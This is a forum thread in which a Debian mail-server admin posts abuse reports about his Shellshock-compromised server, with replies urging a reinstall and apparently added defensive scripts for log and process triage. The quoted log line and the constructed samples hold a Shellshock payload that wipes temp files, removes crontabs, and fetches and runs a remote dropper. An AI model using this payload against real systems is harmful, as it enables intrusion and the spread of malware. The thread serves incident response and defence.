Author Topic: mail server attack  (Read 1223 times)


Offline dendic

mail server attack
« on: May 03, 2015, 08:31:16 am »
I received the following message. Please explain my problem a little, and what can I do with my mail server (Postfix, Debian) to protect everything? (I have SpamAssassin on the mail server.)



From: chopper boy <choprboy@hotmail.com>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "abuse@xxx.com"

Compromised server / Exploit attempts

Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.

Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP of my server)

Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif

Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>

5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400 304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x i.gif ; nohup ./i.gif & \");'"

« Last Edit: May 03, 2015, 08:36:20 am by dendic »
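The request quoted in that abuse report is the Shellshock pattern (CVE-2014-6271): a bash function definition `() { :;};` placed in an HTTP header, so that a CGI handler which exports the header into the environment runs the command that follows it. Added example, not code from the thread or from anyone posting in it: a small POSIX shell script that pulls such attempts out of a web-server access log, lists the attacking addresses and the staging URLs to block, and checks whether the local bash still has the original bug. The log lines, the addresses (203.0.113.x, 198.51.100.x) and the file names in it are constructed for the example; only their shape follows the report above.

```shell
#!/bin/sh
# Added example, not part of the thread: find Shellshock-style requests in an
# access log and extract indicators. Sample log is constructed; the first and
# third lines mimic the shape of the request in the abuse report.

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.7 - - [28/Apr/2015:14:45:57 -0700] "GET / HTTP/1.1" 400 304 "-" "() { :;};/usr/bin/perl -e 'system(\"cd /tmp ; wget http://203.0.113.9/i.gif ; curl -O http://203.0.113.9/i.gif ; chmod +x i.gif ; nohup ./i.gif &\");'"
198.51.100.2 - - [28/Apr/2015:14:46:01 -0700] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2015:14:47:10 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c \"curl http://203.0.113.9/nynew54.gif -o /tmp/x\""
EOF

# Log lines carrying the "() {" function-definition marker anywhere in the
# request (User-Agent, Referer, Cookie, request line all end up in the log).
# The regex tolerates extra whitespace before the brace as seen in scanner
# variants; no legitimate header value starts with that token.
shellshock_hits() {
    grep -E '\(\) *\{' "$1"
}

# Distinct source addresses of the hits (first field of the combined format).
shellshock_sources() {
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

# Download URLs named inside the payloads: the staging hosts to block at the
# firewall, and the file names to look for under /tmp and /var/tmp.
shellshock_urls() {
    shellshock_hits "$1" | grep -oE 'https?://[^ "\\;]+' | sort -u
}

# Canonical check for the original bug on this host: a patched bash does not
# execute the command that trails the function body when importing it from
# the environment. Exit status 0 means the installed bash is still vulnerable.
bash_shellshock_vulnerable() {
    env x='() { :;}; echo vulnerable' bash -c 'true' 2>/dev/null | grep -q vulnerable
}

echo "== exploit attempts =="; shellshock_hits "$SAMPLE_LOG"
echo "== source IPs ==";       shellshock_sources "$SAMPLE_LOG"
echo "== staging URLs ==";     shellshock_urls "$SAMPLE_LOG"
if bash_shellshock_vulnerable; then
    echo "local bash: VULNERABLE to CVE-2014-6271, update bash now"
else
    echo "local bash: not vulnerable to the original test (or bash not installed)"
fi
```

On the real server run the same functions against `/var/log/apache2/access.log` (or the nginx equivalent) rather than the sample file. A hit proves an attempt, not a success; a 200 response on a CGI path, or the staging file names turning up in `/tmp`, is what confirms the box executed the payload. The bash check only covers the first Shellshock bug, so an up-to-date `apt-get upgrade bash` is the real fix, not a negative result here.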

Offline proxx

Re: mail server attack
« Reply #1 on: May 03, 2015, 09:47:52 am »
Please give more information about the situation; thus far it is not clear.
From the looks of it, from what I can tell, your server has been compromised and it is attacking other boxes.
Best bet is to set up another box, since it is very hard to tell if you have rootkits.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline dendic

Re: mail server attack
« Reply #2 on: May 03, 2015, 02:59:42 pm »

What kind of protection should I install, and how do I clean up my mail server?

From: Christopher Ravnborg <cr@rackhosting.com>
Date: 2015-04-29 10:34 GMT+02:00
Subject: xxx.xxx.xxx.xxx hosting malicious content
To: ivanxx@mydomain.net
Cc: "abuse@rackhosting.com" <abuse@rackhosting.com>

Hello,

xxx.xxx.xxx.xxx is hosting malicious content in the form of brute-force and/or DDoS tools.

http://xxx.xxx.xxx.xxx/i.gif shellcode
http://xxx.xxx.xxx.xxx/nynew54.gif tar archive.

Please handle this issue.

--
Med venlig hilsen / Best regards
Christopher Ravnborg
Rackhosting.com ApS

Offline proxx

Re: mail server attack
« Reply #3 on: May 03, 2015, 03:08:55 pm »
As I said, I suggest you just do a fresh install and keep auto-updates on.
Migrating the mail DB shouldn't be that hard.
« Last Edit: May 03, 2015, 03:09:06 pm by proxx »

Offline iTpHo3NiX

Re: mail server attack
« Reply #4 on: May 03, 2015, 08:57:05 pm »
Also remove those gifs, considering they're the malicious payload...
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry
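The advice above (reinstall rather than clean) is the right call, but before the box is wiped it is worth confirming what the payload left running and collecting indicators for the replies to both abuse reports. The request in the first report does `cd /tmp`, fetches `i.gif`, starts it with `nohup ./i.gif &` and runs `crontab -r`, so processes whose command line points into a world-writable temp directory, or that were started as `./something`, are the first thing to list. Added example, not from the thread: a POSIX shell triage helper that reads `ps -eo pid,user,args` output on stdin so it can also be run over a saved listing. The process listing embedded in it is constructed; the pids, the `pnscan` arguments and the `bf.pl` name are assumptions for the example, and `show_exe` assumes a Linux `/proc`.

```shell
#!/bin/sh
# Added example, not part of the thread: first-pass triage for the infection
# described in the abuse reports. The listing below is constructed; only the
# shape (ps -eo pid,user,args) and the /tmp-resident dropper follow the report.

SAMPLE_PS='  PID USER     COMMAND
    1 root     /sbin/init
  812 postfix  qmgr -l -t unix -u
 1190 root     /usr/sbin/apache2 -k start
 2041 www-data /tmp/i.gif
 2044 www-data ./pnscan -r SSH 198.51.100.0/24 22
 2050 www-data perl /var/tmp/bf.pl
 2077 root     /usr/lib/postfix/smtpd'

# Print "<pid> <offending token>" for every process whose command line
# references /tmp, /var/tmp or /dev/shm, or whose argv[0] is relative (./x),
# which is how "nohup ./i.gif &" shows up. Skips the ps header line.
flag_tmp_processes() {
    awk 'NR > 1 {
        if ($3 ~ /^\.\//) { print $1, $3; next }
        for (i = 3; i <= NF; i++)
            if ($i ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\//) { print $1, $i; next }
    }'
}

# Live follow-up for flagged pids: the binary actually mapped as the process
# image. This still resolves (marked "(deleted)") when the dropper removed
# its own file after starting, which a plain ps listing hides.
show_exe() {
    for pid in "$@"; do
        printf '%s -> ' "$pid"
        readlink "/proc/$pid/exe" 2>/dev/null || echo '(gone or no permission)'
    done
}

echo "== processes running from temp dirs (sample listing) =="
printf '%s\n' "$SAMPLE_PS" | flag_tmp_processes
```

On the compromised host run `ps -eo pid,user,args | flag_tmp_processes`, then `show_exe` on the pids it prints, and copy `/tmp`, `/var/tmp` and the flagged binaries off the box before anything is killed; those are the samples and hashes the abuse desks will ask for. An empty `crontab -l -u www-data` is not evidence of a clean system here, because the payload itself runs `crontab -r`, and none of this replaces the reinstall.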